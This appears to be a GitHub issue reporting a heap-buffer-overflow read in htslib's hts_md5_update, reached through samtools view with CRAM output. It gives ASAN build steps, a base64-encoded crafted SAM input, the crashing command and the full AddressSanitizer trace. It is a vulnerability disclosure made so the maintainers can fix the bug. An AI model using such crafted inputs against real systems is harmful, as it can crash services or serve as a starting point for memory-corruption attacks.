Heap overflow during hts_md5_update

[OctavioGalland]

Summary

Heap-buffer overflow in hts_md5_update during parsing of a crafted SAM/FASTA file pair.

Environment

Built using LLVM 14 with ASAN on Ubuntu 22.04

How to reproduce

Build with ASAN on latest commit like so:

git clone --recursive https://github.com/samtools/htslib
cd htslib
autoreconf -i
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address -g" ./configure
make -j$(nproc)

git clone --recursive https://github.com/samtools/samtools
cd samtools
autoheader
autoconf -Wno-syntax
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" CXXFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" LDFLAGS="-fsanitize=address -g -L$(pwd)/../htslib" ./configure
make -j$(nproc)

Within the samtools folder, get poc file and reproduce with:

echo -ne "CTAJYzEJMQkzCTEwTQkqCTAJMAlBQUNDLENHR1RUCUAqKioqKioqKioKczEJMAljMgkyMTExMTEx
MTEJMAkqME0JKgkwCTAJQUNDR0NHR1RUQwkqKioqKioqKioqCU1DR0NHR1RUQ0cJKioJSUExMTEx
MSowCnMwCTAJYzIJMQkwCTEwTQkqCTAJMAlBQUNDLENHR1RUCUAqKioqKioqKioKczEJzwljMQky
CTAJMTBNCSoJMAkwCb5DQ0dDR0dUCTAJYzEJMgkwCTEwTQkqCTAJMAm+Q0NHQ0dHVFRDCSoqKioq
KiovKioJQ0NHQ0dHVFRDRyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKjIJTE4q
KioqKjExKioqQEBRCVP/f///CUxOOjEwCnM9CS/3YzEJMQkwCUdUVAkqKioqKioqKioqKioqKioq
Kio=" | base64 -d > poc
./samtools view -C -T ../htslib/test/c2.fa poc

Which on my setup outputs:

CRAM- ��=�������m��
� ��]�)|u�V�i� �%�Uw�O�`�@Y��cu�.ݾ���eY�Qg��С�����_[ɥ�9��7��l
av,@��X��E;���(eC��س�bb ����ݡ�V&Ԛ__��K"8��B:�
d-)�����n]]E���[W::sam_parse1] empty query name�~I���I�����#��
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] mapped query must have a CIGAR; treated as unmapped
[W::sam_read1_sam] Parse error at line 4
=================================================================
==12672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000051d8 at pc 0x5620c14796fb bp 0x7fffbd07d7a0 sp 0x7fffbd07d798
READ of size 4 at 0x6020000051d8 thread T0
    #0 0x5620c14796fa in body /home/octavio/oss/htslib/md5.c:141:3
    #1 0x5620c14793c4 in hts_md5_update /home/octavio/oss/htslib/md5.c:264:10
    #2 0x5620c1537cbd in cram_encode_container /home/octavio/oss/htslib/cram/cram_encode.c:2041:17
    #3 0x5620c15a796c in cram_flush_container /home/octavio/oss/htslib/cram/cram_io.c:4128:14
    #4 0x5620c15a8795 in cram_flush_container_mt /home/octavio/oss/htslib/cram/cram_io.c:4280:16
    #5 0x5620c15b3742 in cram_flush /home/octavio/oss/htslib/cram/cram_io.c:5431:19
    #6 0x5620c14422e7 in hts_flush /home/octavio/oss/htslib/hts.c:1667:16
    #7 0x5620c13bb084 in vprint_error_core /home/octavio/oss/samtools/sam_utils.c:48:26
    #8 0x5620c13bb45c in print_error_errno /home/octavio/oss/samtools/sam_utils.c:71:5
    #9 0x5620c11c4472 in stream_view /home/octavio/oss/samtools/sam_view.c:762:9
    #10 0x5620c11bfbe8 in main_samview /home/octavio/oss/samtools/sam_view.c:1363:15
    #11 0x5620c123eeed in main /home/octavio/oss/samtools/bamtk.c:244:55
    #12 0x7f6ffe829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #13 0x7f6ffe829e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #14 0x5620c10e3b24 in _start (/home/octavio/oss/samtools/samtools+0xb0b24) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)

0x6020000051d9 is located 0 bytes to the right of 9-byte region [0x6020000051d0,0x6020000051d9)
allocated by thread T0 here:
    #0 0x5620c116696e in malloc (/home/octavio/oss/samtools/samtools+0x13396e) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x5620c1599237 in load_ref_portion /home/octavio/oss/htslib/cram/cram_io.c:3254:29
    #2 0x5620c15988ca in cram_ref_load /home/octavio/oss/htslib/cram/cram_io.c:3360:17
    #3 0x5620c159a526 in cram_get_ref /home/octavio/oss/htslib/cram/cram_io.c:3510:27
    #4 0x5620c15ad639 in cram_write_SAM_hdr /home/octavio/oss/htslib/cram/cram_io.c:4913:23
    #5 0x5620c14a3a10 in sam_hdr_write /home/octavio/oss/htslib/sam.c:2206:13
    #6 0x5620c11bdf8a in main_samview /home/octavio/oss/samtools/sam_view.c:1250:17
    #7 0x5620c123eeed in main /home/octavio/oss/samtools/bamtk.c:244:55
    #8 0x7f6ffe829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/octavio/oss/htslib/md5.c:141:3 in body
Shadow bytes around the buggy address:
  0x0c047fff89e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 fa
  0x0c047fff89f0: fa fa 04 fa fa fa 03 fa fa fa 00 07 fa fa 00 00
  0x0c047fff8a00: fa fa 04 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa
  0x0c047fff8a10: fa fa 00 00 fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x0c047fff8a20: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fa
=>0x0c047fff8a30: fa fa fd fd fa fa 00 fa fa fa 00[01]fa fa fd fa
  0x0c047fff8a40: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
  0x0c047fff8a50: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
  0x0c047fff8a60: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fff8a70: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fff8a80: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12672==ABORTING

Note that this may be related to #1693 . However, both the allocation site and the function in which the faulty access occur are different.